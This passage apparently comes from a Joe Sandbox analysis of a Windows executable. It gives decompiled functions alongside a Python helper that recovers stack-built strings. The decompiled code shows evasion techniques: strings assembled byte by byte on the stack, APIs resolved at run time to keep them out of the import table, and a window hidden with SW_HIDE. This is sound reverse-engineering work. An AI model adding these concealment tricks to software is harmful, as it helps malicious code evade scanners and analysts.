                                                            				char _v14;
                                                            				char _v15;
                                                            				char _v16;
                                                            				signed int _t10;
                                                            				struct HINSTANCE__* _t13;
                                                            				intOrPtr _t15;
                                                            				intOrPtr _t18;
                                                            				intOrPtr _t19;
                                                            				intOrPtr _t20;
                                                            				signed int _t21;
                                                            
                                                            				_t10 =  *0x40f020; // 0xebf16b9c
                                                            				_v8 = _t10 ^ _t21; // MSVC /GS stack cookie: global cookie XOR frame pointer, verified before return
                                                            				// The DLL name is assembled on the stack one byte at a time (a "stack string"),
                                                            				// so "OLE32" never appears as a contiguous string in the file's data section.
                                                            				_v16 = 0x4f; // 'O'
                                                            				_v15 = 0x4c; // 'L'
                                                            				_v14 = 0x45; // 'E'
                                                            				_v13 = 0x33; // '3'
                                                            				_v12 = 0x32; // '2'
                                                            				_v11 = 0;    // NUL terminator
                                                            				_t8 =  &_v16; // "OLE32"
                                                            				_t13 = LoadLibraryA(_t8); // executed: HMODULE of ole32.dll
                                                            				return E0040158C(_t13, _t15, _v8 ^ _t21, _t18, _t19, _t20); // cookie check, then return the module handle
                                                            			}

                                                            APIs
                                                            • LoadLibraryA.KERNELBASE(OLE32), ref: 0040B15C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: OLE32
                                                            • API String ID: 1029625771-2276369563
                                                            • Opcode ID: 980a06aea9a35d8a7ae7649d9989a00455e2bd3b3d54e8f512e950044cdb9623
                                                            • Instruction ID: d47033aa0ce206b92a5c2489ca363cbd33bce9cfa044549ede1ceb72ee371031
                                                            • Opcode Fuzzy Hash: 980a06aea9a35d8a7ae7649d9989a00455e2bd3b3d54e8f512e950044cdb9623
                                                            • Instruction Fuzzy Hash: FFF03020D0428CEADB01DBE8C44878CBFB85B15208F4480E985456B282D6795708C76A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (basic blocks: address range, notable calls; edges)

                                                            • 27: 40b170-40b1aa, call 40b0e0, GetProcAddress
                                                            C-Code - Quality: 58%
                                                            			E0040B170(intOrPtr _a4) {
                                                            				_Unknown_base(*)()* _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				char _v20;
                                                            
                                                            				// Export name stacked as little-endian dword immediates: "Show", "Wind", "ow\0"
                                                            				_v20 = 0x776f6853; // "Show"
                                                            				_v16 = 0x646e6957; // "Wind"
                                                            				_v12 = 0x776f;     // "ow" followed by NUL
                                                            				_t4 =  &_v20; // "ShowWindow"
                                                            				// E0040B0E0 performs LoadLibraryA("USER32"); the export is resolved by name at run time,
                                                            				// so ShowWindow does not show up in the import table.
                                                            				_v8 = GetProcAddress(E0040B0E0(), _t4);
                                                            				// ShowWindow(hWnd = _a4, nCmdShow = 0 /* SW_HIDE */): hides the window passed by the caller
                                                            				return _v8(_a4, 0);
                                                            			}

                                                            APIs
                                                              • Part of subcall function 0040B0E0: LoadLibraryA.KERNEL32(USER32), ref: 0040B110
                                                            • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 0040B195
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: ShowWindow
                                                            • API String ID: 2574300362-1268545403
                                                            • Opcode ID: a957005a050c3c7cee9ee321a0b9ae71f5b3dbb3a7dbfed1b9329c84cc1db1ba
                                                            • Instruction ID: 2938ed01b3610a0eb917c5aedbf5f10d734c743d9f5ae708fe635bca05b760e3
                                                            • Opcode Fuzzy Hash: a957005a050c3c7cee9ee321a0b9ae71f5b3dbb3a7dbfed1b9329c84cc1db1ba
                                                            • Instruction Fuzzy Hash: CDE04FB0C0420DEBCB00EFE0C90AAAEBB78FB00204F10859CE92867280E7749A008B94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
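E0040B130 and E0040B170 above both hide the strings they pass to LoadLibraryA and GetProcAddress by writing immediates into stack locals, which is why neither "OLE32" nor "ShowWindow" is visible to a plain string scan of the binary. The helper below is an added example, not code from the Joe Sandbox report or from the sample: it rebuilds such strings straight from the decompiler's `_vN = <immediate>;` assignments. The function names `parse_immediate_writes` and `rebuild_stack_strings` are the author's, and the only assumption about the listing format is that `_vN` is the local at frame offset -N, so a larger N sits at a lower address. The two input listings are copied from the decompiled functions above.

```python
import re

# Matches a decompiler local assigned an immediate, e.g. `_v20 = 0x776f6853;` or `_v11 = 0;`.
# Assumption: `_vN` is the local at frame offset -N, so larger N means a lower address.
_IMM_ASSIGN = re.compile(r"_v(\d+)\s*=\s*(0x[0-9A-Fa-f]+|\d+)\s*;")


def parse_immediate_writes(decompiled: str) -> list[tuple[int, int]]:
    """Return (frame_offset, value) for every `_vN = <imm>;` statement in the listing."""
    writes = []
    for m in _IMM_ASSIGN.finditer(decompiled):
        text = m.group(2)
        value = int(text, 16) if text.lower().startswith("0x") else int(text, 10)
        writes.append((int(m.group(1)), value))
    return writes


def rebuild_stack_strings(decompiled: str) -> list[str]:
    """Lay each immediate out little-endian at its frame offset and return the
    printable NUL-terminated runs, i.e. the strings the code assembles on the stack."""
    writes = parse_immediate_writes(decompiled)
    if not writes:
        return []
    base = max(offset for offset, _ in writes)  # deepest local == start of the buffer
    buf = bytearray()
    for offset, value in writes:
        pos = base - offset
        width = max(1, (value.bit_length() + 7) // 8)  # 0x776f -> 2 bytes, 0x4f -> 1 byte, 0 -> 1 NUL
        chunk = value.to_bytes(width, "little")
        if len(buf) < pos + width:
            buf.extend(b"\0" * (pos + width - len(buf)))
        buf[pos:pos + width] = chunk
    strings = []
    for run in bytes(buf).split(b"\0"):
        if run and all(0x20 <= b < 0x7F for b in run):
            strings.append(run.decode("ascii"))
    return strings


# Listings copied from E0040B170 and E0040B130 in the report above.
SHOWWINDOW_LISTING = """
    _v20 = 0x776f6853;
    _v16 = 0x646e6957;
    _v12 = 0x776f;
"""

OLE32_LISTING = """
    _v16 = 0x4f;
    _v15 = 0x4c;
    _v14 = 0x45;
    _v13 = 0x33;
    _v12 = 0x32;
    _v11 = 0;
"""

if __name__ == "__main__":
    for name, listing in (("E0040B170", SHOWWINDOW_LISTING), ("E0040B130", OLE32_LISTING)):
        print(name, rebuild_stack_strings(listing))
```

Because the width of each write is taken from the value rather than from the declared type, a dword that only carries two characters (the `0x776f` tail of "ShowWindow") lands in the buffer without padding, and a write of `0` simply terminates the run; locals that are not part of a string fall out as non-printable bytes and are dropped.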

                                                            Control-flow Graph (basic blocks: address range, notable calls; edges)

                                                            • 31: 40bce0-40bce8, call 40b130; 31->33
                                                            • 33: 40bced-40bcfa, GetProcAddress
                                                            C-Code - Quality: 100%
                                                            			E0040BCE0() {
                                                            				struct HINSTANCE__* _t1;
                                                            				_Unknown_base(*)()* _t2;
                                                            
                                                            				_t1 = E0040B130(); // executed: LoadLibraryA("OLE32") through the stack-string loader above
                                                            				_t2 = GetProcAddress(_t1, "CoInitializeSecurity"); // this export name is a plain literal, not stacked
                                                            				 *0x411060 = _t2; // resolved pointer cached in a global for later use
                                                            				return _t2;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 0040B130: LoadLibraryA.KERNELBASE(OLE32), ref: 0040B15C
                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 0040BCEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: CoInitializeSecurity
                                                            • API String ID: 2574300362-4240294626
                                                            • Opcode ID: 858e63394dc20911a5a2b4bc9d735a2b77d167d8c34a28d337205b0f396a1cd2
                                                            • Instruction ID: 9360bdbcb8040919587fa8726506409a21c246ffa320766f12b7ef0611b22f1f
                                                            • Opcode Fuzzy Hash: 858e63394dc20911a5a2b4bc9d735a2b77d167d8c34a28d337205b0f396a1cd2
                                                            • Instruction Fuzzy Hash: 40B09B7484430C97C50067E56C096057A5CE945A547104136B54971595D7755044C55D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (basic blocks: address range, notable calls; edges)

                                                            • 34: 401bc9-401be7, HeapCreate; 34->35, 34->36
                                                            • 35: 401be9-401beb
                                                            • 36: 401bec-401bf9, call 401b6e; 36->39, 36->40
                                                            • 39: 401bfb-401c08, call 401dca; 39->40, 39->43
                                                            • 40: 401c1f-401c22
                                                            • 43: 401c0a-401c1d, HeapDestroy; 43->35
                                                            C-Code - Quality: 100%
                                                            			E00401BC9(intOrPtr _a4) {
                                                            				void* _t6;
                                                            				intOrPtr _t7;
                                                            				void* _t10;
                                                            
                                                            				// Matches the Visual C++ CRT _heap_init(mtflag): `0 | _a4 == 0` parses as `0 | (_a4 == 0)`,
                                                            				// i.e. HEAP_NO_SERIALIZE (1) when the single-threaded flag is passed. Runtime boilerplate, not sample logic.
                                                            				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                            				 *0x4103b4 = _t6; // _crtheap
                                                            				if(_t6 != 0) {
                                                            					_t7 = E00401B6E(__eflags); // __heap_select()
                                                            					__eflags = _t7 - 3;
                                                            					 *0x4111cc = _t7; // __active_heap
                                                            					if(_t7 != 3) { // 3 == __V6_HEAP: only the small-block heap needs extra setup
                                                            						L5:
                                                            						__eflags = 1;
                                                            						return 1;
                                                            					} else {
                                                            						_t10 = E00401DCA(0x3f8); // __sbh_heap_init(MAX_ALLOC_DATA_SIZE)
                                                            						__eflags = _t10;
                                                            						if(_t10 != 0) {
                                                            							goto L5;
                                                            						} else {
                                                            							HeapDestroy( *0x4103b4); // small-block heap setup failed: tear the heap down and report failure
                                                            							 *0x4103b4 =  *0x4103b4 & 0x00000000;
                                                            							goto L1;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					L1:
                                                            					return 0;
                                                            				}
                                                            			}

                                                            APIs
                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040191E,00000001), ref: 00401BDA
                                                            • HeapDestroy.KERNEL32 ref: 00401C10
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Heap$CreateDestroy
                                                            • String ID:
                                                            • API String ID: 3296620671-0
                                                            • Opcode ID: 97ab96e9f71bcaa33df601b14429b25905b46657d09f8824084d419041d220c1
                                                            • Instruction ID: 7a46a3d2506183b1fa3ee5d0035033dae20cdc213793c08df3dd9dbf1a3001fa
                                                            • Opcode Fuzzy Hash: 97ab96e9f71bcaa33df601b14429b25905b46657d09f8824084d419041d220c1
                                                            • Instruction Fuzzy Hash: 48E09230698305EFEB106B70AE0936636E4E74074AF00883EF600E50F4FBB8C480DA0C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (basic blocks: address range, notable calls; edges)

                                                            • 44: 4036d2-4036e0, call 4036ac, ExitProcess
                                                            C-Code - Quality: 100%
                                                            			E004036D2(int _a4) {
                                                            
                                                            				E004036AC(_a4); // __crtCorExitProcess: if mscoree.dll is loaded, hand the exit code to CorExitProcess first
                                                            				ExitProcess(_a4); // CRT __crtExitProcess: ordinary process termination, nothing sample-specific
                                                            			}

                                                            APIs
                                                            • ___crtCorExitProcess.LIBCMT ref: 004036D6
                                                              • Part of subcall function 004036AC: GetModuleHandleA.KERNEL32(mscoree.dll,004036DB,?,00405951,000000FF,0000001E,00000001,00000000,00000000,?,0040351F,?,00000001,?,00401D23,00000018), ref: 004036B1
                                                              • Part of subcall function 004036AC: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004036C1
                                                            • ExitProcess.KERNEL32 ref: 004036E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                            • String ID:
                                                            • API String ID: 2427264223-0
                                                            • Opcode ID: 3819742ebc53de71990435e9f2c10b37127336b8a94d75d022c06b3f46a52c46
                                                            • Instruction ID: a07d56fe43460000000566a6c44e306eae857fe116f2a4537ab27f894ce8fb9f
                                                            • Opcode Fuzzy Hash: 3819742ebc53de71990435e9f2c10b37127336b8a94d75d022c06b3f46a52c46
                                                            • Instruction Fuzzy Hash: FBB00271004540FFD6152F51DE4B41E7FA5EF90715F10893DF049541B19B7A9D64FE09
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (basic blocks: address range, notable calls; edges)

                                                            • 47: 403904-40390c, call 403836; 47->49
                                                            • 49: 403911-403914
                                                            C-Code - Quality: 25%
                                                            			E00403904(intOrPtr _a4) {
                                                            				void* _t2;
                                                            				void* _t3;
                                                            				void* _t4;
                                                            				void* _t5;
                                                            				void* _t8;
                                                            
                                                            				// CRT exit(code): _doexit(code, quick = 0, retcaller = 0) runs the atexit handlers and terminates
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(_a4);
                                                            				_t2 = E00403836(_t3, _t4, _t5, _t8); // executed: _doexit
                                                            				return _t2;
                                                            			}

                                                            APIs
                                                            • _doexit.LIBCMT ref: 0040390C
                                                              • Part of subcall function 00403836: __lock.LIBCMT ref: 00403844
                                                              • Part of subcall function 00403836: __decode_pointer.LIBCMT ref: 00403873
                                                              • Part of subcall function 00403836: __decode_pointer.LIBCMT ref: 00403880
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: __decode_pointer$__lock_doexit
                                                            • String ID:
                                                            • API String ID: 3276244213-0
                                                            • Opcode ID: 44ea3af290a5c0fced421c48bee69f607f8ea4075bd654cc3defe53151bfea1d
                                                            • Instruction ID: 66755315c0f1c1fd9d05dc6c38d0ad6e5274e01c061bfe93bc0f52b7166101c4
                                                            • Opcode Fuzzy Hash: 44ea3af290a5c0fced421c48bee69f607f8ea4075bd654cc3defe53151bfea1d
                                                            • Instruction Fuzzy Hash: 53A0243354430035D53035007C03F0437401740F00FF0C0747504341D071751314C40F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 85%
                                                            			E0040158C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                            				intOrPtr _v0;
                                                            				void* _v804;
                                                            				intOrPtr _v808;
                                                            				intOrPtr _v812;
                                                            				intOrPtr _t6;
                                                            				intOrPtr _t11;
                                                            				intOrPtr _t12;
                                                            				intOrPtr _t13;
                                                            				long _t17;
                                                            				intOrPtr _t21;
                                                            				intOrPtr _t22;
                                                            				intOrPtr _t25;
                                                            				intOrPtr _t26;
                                                            				intOrPtr _t27;
                                                            				intOrPtr* _t31;
                                                            				void* _t34;
                                                            
                                                            				_t27 = __esi;
                                                            				_t26 = __edi;
                                                            				_t25 = __edx;
                                                            				_t22 = __ecx;
                                                            				_t21 = __ebx;
                                                            				_t6 = __eax;
                                                            				_t34 = _t22 -  *0x40f020; // 0xebf16b9c
                                                            				if(_t34 == 0) {
                                                            					asm("repe ret");
                                                            				}
                                                            				 *0x410198 = _t6;
                                                            				 *0x410194 = _t22;
                                                            				 *0x410190 = _t25;
                                                            				 *0x41018c = _t21;
                                                            				 *0x410188 = _t27;
                                                            				 *0x410184 = _t26;
                                                            				 *0x4101b0 = ss;
                                                            				 *0x4101a4 = cs;
                                                            				 *0x410180 = ds;
                                                            				 *0x41017c = es;
                                                            				 *0x410178 = fs;
                                                            				 *0x410174 = gs;
                                                            				asm("pushfd");
                                                            				_pop( *0x4101a8);
                                                            				 *0x41019c =  *_t31;
                                                            				 *0x4101a0 = _v0;
                                                            				 *0x4101ac =  &_a4;
                                                            				 *0x4100e8 = 0x10001;
                                                            				_t11 =  *0x4101a0; // 0x0
                                                            				 *0x41009c = _t11;
                                                            				 *0x410090 = 0xc0000409;
                                                            				 *0x410094 = 1;
                                                            				_t12 =  *0x40f020; // 0xebf16b9c
                                                            				_v812 = _t12;
                                                            				_t13 =  *0x40f024; // 0x140e9463
                                                            				_v808 = _t13;
                                                            				 *0x4100e0 = IsDebuggerPresent();
                                                            				_push(1);
                                                            				E004045BD(_t14);
                                                            				SetUnhandledExceptionFilter(0);
                                                            				_t17 = UnhandledExceptionFilter(0x40c1c0);
                                                            				if( *0x4100e0 == 0) {
                                                            					_push(1);
                                                            					E004045BD(_t17);
                                                            				}
                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                            			}

                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 00401AD5
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401AEA
                                                            • UnhandledExceptionFilter.KERNEL32(0040C1C0), ref: 00401AF5
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00401B11
                                                            • TerminateProcess.KERNEL32(00000000), ref: 00401B18
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID:
                                                            • API String ID: 2579439406-0
                                                            • Opcode ID: 4680c75607d7577f34d6963ebdb382a5457bef44eca2429c131e247a8cb8d2a8
                                                            • Instruction ID: 95bf7be63045225ff91cd778832c0e9476504d7f9fd5b569df8d05804f655771
                                                            • Opcode Fuzzy Hash: 4680c75607d7577f34d6963ebdb382a5457bef44eca2429c131e247a8cb8d2a8
                                                            • Instruction Fuzzy Hash: BD21BFB4940304EFD751DF64FD85B853BB0BB08314F40823AEA09A62A1E7BA55C4CF5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E0040798E() {
                                                            				signed int _v8;
                                                            				char _v16;
                                                            				void* __esi;
                                                            				signed int _t8;
                                                            				intOrPtr* _t15;
                                                            				intOrPtr _t16;
                                                            				char _t20;
                                                            				intOrPtr _t22;
                                                            				intOrPtr _t23;
                                                            				signed int _t24;
                                                            				int _t25;
                                                            				signed int _t27;
                                                            
                                                            				_t8 =  *0x40f020; // 0xebf16b9c
                                                            				_v8 = _t8 ^ _t27;
                                                            				_t24 = 0;
                                                            				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
                                                            					L4:
                                                            					_t25 = GetACP();
                                                            				} else {
                                                            					_t20 = _v16;
                                                            					_t15 =  &_v16;
                                                            					if(_t20 == 0) {
                                                            						goto L4;
                                                            					} else {
                                                            						do {
                                                            							_t15 = _t15 + 1;
                                                            							_t24 = _t24 * 0xa + _t20 - 0x30;
                                                            							_t20 =  *_t15;
                                                            						} while (_t20 != 0);
                                                            						if(_t24 == 0) {
                                                            							goto L4;
                                                            						}
                                                            					}
                                                            				}
                                                            				return E0040158C(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
                                                            			}

                                                            APIs
                                                            • GetThreadLocale.KERNEL32 ref: 004079A1
                                                            • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 004079B3
                                                            • GetACP.KERNEL32 ref: 004079DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Locale$InfoThread
                                                            • String ID:
                                                            • API String ID: 4232894706-0
                                                            • Opcode ID: d9941fd1adb6fe47d3b84eded022188f17d0a95e4d665cfb3c79fe0f3a7ca5e7
                                                            • Instruction ID: d183e5ce8bfd03808df9941a685c8502e29c53e435c0df6e02fd4a63ca2beaa2
                                                            • Opcode Fuzzy Hash: d9941fd1adb6fe47d3b84eded022188f17d0a95e4d665cfb3c79fe0f3a7ca5e7
                                                            • Instruction Fuzzy Hash: EDF0C831D04228EFEB219BB499556EF77A4AB05B40B00417ADC41F7280D6346D09CBE9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E00407DEA(void* __eax, void* __ebx, void* __edx) {
                                                            				_Unknown_base(*)()* _t8;
                                                            
                                                            				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
                                                            				_t8 = SetUnhandledExceptionFilter(E0040304B());
                                                            				 *0x410c3c = 0;
                                                            				return _t8;
                                                            			}

                                                            APIs
                                                            • __decode_pointer.LIBCMT ref: 00407DF8
                                                              • Part of subcall function 0040304B: TlsGetValue.KERNEL32(?,004030D2,?,?,00401B60,00401612), ref: 00403058
                                                              • Part of subcall function 0040304B: TlsGetValue.KERNEL32(00000004,?,?,00401B60,00401612), ref: 0040306F
                                                              • Part of subcall function 0040304B: RtlDecodePointer.NTDLL(?,?,?,00401B60,00401612), ref: 004030A2
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407DFF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Value$DecodeExceptionFilterPointerUnhandled__decode_pointer
                                                            • String ID:
                                                            • API String ID: 3433037573-0
                                                            • Opcode ID: 8b09cf5b1d281532ffb97b8283969e1f6be09899a8b043c20a5e4947f6f15768
                                                            • Instruction ID: b384e89960f4d02eca1f615e29a76eafc12a2951546bdf11efc83c3067051462
                                                            • Opcode Fuzzy Hash: 8b09cf5b1d281532ffb97b8283969e1f6be09899a8b043c20a5e4947f6f15768
                                                            • Instruction Fuzzy Hash: D9C08C704382888BC32867BA5ACC38E3E049703600F4086BA908088082EAFC80CCCFA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E004071DC(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, int _a4) {
                                                            				signed int _v8;
                                                            				char _v10;
                                                            				char _v16;
                                                            				signed int _t7;
                                                            				signed int _t10;
                                                            				signed int _t12;
                                                            				intOrPtr _t14;
                                                            				intOrPtr _t18;
                                                            				intOrPtr _t19;
                                                            				intOrPtr _t20;
                                                            				signed int _t21;
                                                            
                                                            				_t20 = __esi;
                                                            				_t19 = __edi;
                                                            				_t18 = __edx;
                                                            				_t14 = __ebx;
                                                            				_t7 =  *0x40f020; // 0xebf16b9c
                                                            				_v8 = _t7 ^ _t21;
                                                            				_v10 = 0;
                                                            				_t10 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
                                                            				if(_t10 != 0) {
                                                            					_t12 = E00407164( &_v16);
                                                            				} else {
                                                            					_t12 = _t10 | 0xffffffff;
                                                            				}
                                                            				return E0040158C(_t12, _t14, _v8 ^ _t21, _t18, _t19, _t20);
                                                            			}

                                                            APIs
                                                            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000006,?,?,?,?,?,?,00000000), ref: 004071FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.267295825.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.267293022.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267302835.000000000040C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267306562.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.267310160.0000000000412000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID:
                                                            • API String ID: 2299586839-0
                                                            • Opcode ID: 1d240fee1b7d8aebe584d8999fc1d73975b58e5ee6b7f811cf08394f0de9266e
                                                            • Instruction ID: 145edfe4598dcb4fa6caf2b76cf0490bc41e6c14005d78a16fa768ceeb522f39
                                                            • Opcode Fuzzy Hash: 1d240fee1b7d8aebe584d8999fc1d73975b58e5ee6b7f811cf08394f0de9266e
                                                            • Instruction Fuzzy Hash: C3E09B30E08308BADB00DBF4D845B9D77B8AF48718F5041BEF911FA2C1D674AA049A5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 57%
                                                            			E0040B270(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                            				void* _v8;
                                                            				char _v12;
                                                            				long _v16;
                                                            				intOrPtr _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				intOrPtr _v44;
                                                            				signed short _v52;
                                                            				char _v56;
                                                            				signed int _v60;
                                                            				signed int _v64;
                                                            				char _v67;
                                                            				char _v68;
                                                            				char _v69;
                                                            				char _v70;
                                                            				char _v71;
                                                            				char _v72;
                                                            				char _v73;
                                                            				char _v74;
